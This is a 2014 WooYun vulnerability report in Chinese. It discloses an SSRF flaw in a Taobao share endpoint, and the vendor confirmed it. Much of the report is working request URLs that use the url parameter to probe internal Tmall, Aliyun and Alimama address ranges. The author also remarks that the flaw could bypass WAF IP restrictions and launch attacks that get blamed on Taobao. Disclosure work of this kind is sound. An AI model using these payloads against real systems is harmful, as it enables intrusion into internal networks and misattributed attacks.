2014-05-26:该漏洞正等待厂商内部评估
2014-05-26:厂商已经确认,与白帽子共同解决该漏洞中,漏洞信息仅向厂商公开
2014-06-05:细节向核心白帽子及相关领域专家公开
2014-06-15:细节向普通白帽子公开
2014-06-25:细节向实习白帽子公开
2014-07-25:细节向公众公开
RT!
详细说明:听说有奖励,来试一下!
其实,是淘宝一个SSRF漏洞,但部分业务内网是打通的,能编制淘宝内网的同时也能编制阿里其他业务内网!
http://share.jianghu.taobao.com/share/addShare.htm?title=&url=http://www.wooyun.org
一下每个测试网段随机ip找一下应用,只测试http协议的80端口:
http://172.24.18.*
天猫:
...
http://share.jianghu.taobao.com/share/addShare.htm?title=&url=http://172.24.18.5
http://share.jianghu.taobao.com/share/addShare.htm?title=&url=http://172.24.18.49
...
http://172.24.22.*
http://share.jianghu.taobao.com/share/addShare.htm?title=&url=http://172.24.22.49
....
http://172.24.23.*
...
http://share.jianghu.taobao.com/share/addShare.htm?title=&url=http://172.24.23.139
http://share.jianghu.taobao.com/share/addShare.htm?title=&url=http://172.24.23.140
....
http://172.24.24.*
...
http://share.jianghu.taobao.com/share/addShare.htm?title=&url=http://172.24.24.1
...
http://172.24.32.1 *
...
http://share.jianghu.taobao.com/share/addShare.htm?title=&url=http://172.24.32.1
...
http://172.24.38.*
...
http://share.jianghu.taobao.com/share/addShare.htm?title=&url=http://172.24.38.30
...
http://share.jianghu.taobao.com/share/addShare.htm?title=&url=http://172.24.23.81:80
阿里云网段:
http://172.18.120.*
...
http://share.jianghu.taobao.com/share/addShare.htm?title=&url=http://172.18.120.112/uc/index.php
...
...
http://share.jianghu.taobao.com/share/addShare.htm?title=&url=http://10.135.252.144/xxx
...
Alimama:
...
http://share.jianghu.taobao.com/share/addShare.htm?title=&url=http://10.254.1.21
...
...
http://share.jianghu.taobao.com/share/addShare.htm?title=&url=http://10.254.2.64
另外,SSRF可以做很多事情,比如绕过外网应用的ip限制等(如:前端WAF)
SSRF就能访问了:
除了用exp打内网应用,我们还可以打外网,嫁祸给淘宝,说是淘宝干的,如:
下次有时间,一定把阿里内网应用结构编织出来,我想那一定很壮观!
内网请求转发到当前用户所在内网,这样才算最合理的设计之一?
版权声明:转载请注明来源 路人甲@乌云漏洞回应 厂商回应:
危害等级:高
漏洞Rank:15
确认时间:2014-05-26 14:53
厂商回复:感谢您对阿里安全的支持!
最新状态:暂无